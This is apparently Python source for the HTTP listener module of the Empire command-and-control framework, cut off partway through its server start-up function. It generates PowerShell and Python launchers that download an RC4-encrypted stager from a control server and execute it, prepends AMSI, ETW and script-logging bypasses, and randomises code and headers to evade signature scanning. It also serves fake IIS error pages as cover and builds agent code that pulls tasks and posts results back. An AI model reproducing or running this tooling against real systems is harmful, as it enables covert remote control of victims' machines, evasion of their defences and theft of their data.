def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
self.session_cookie = ''
# check if the current session cookie not empty and then generate random cookie
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.request.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
stager = helpers.keyword_obfuscation(stager)
self.lock.release()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets.decode('latin-1'))
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
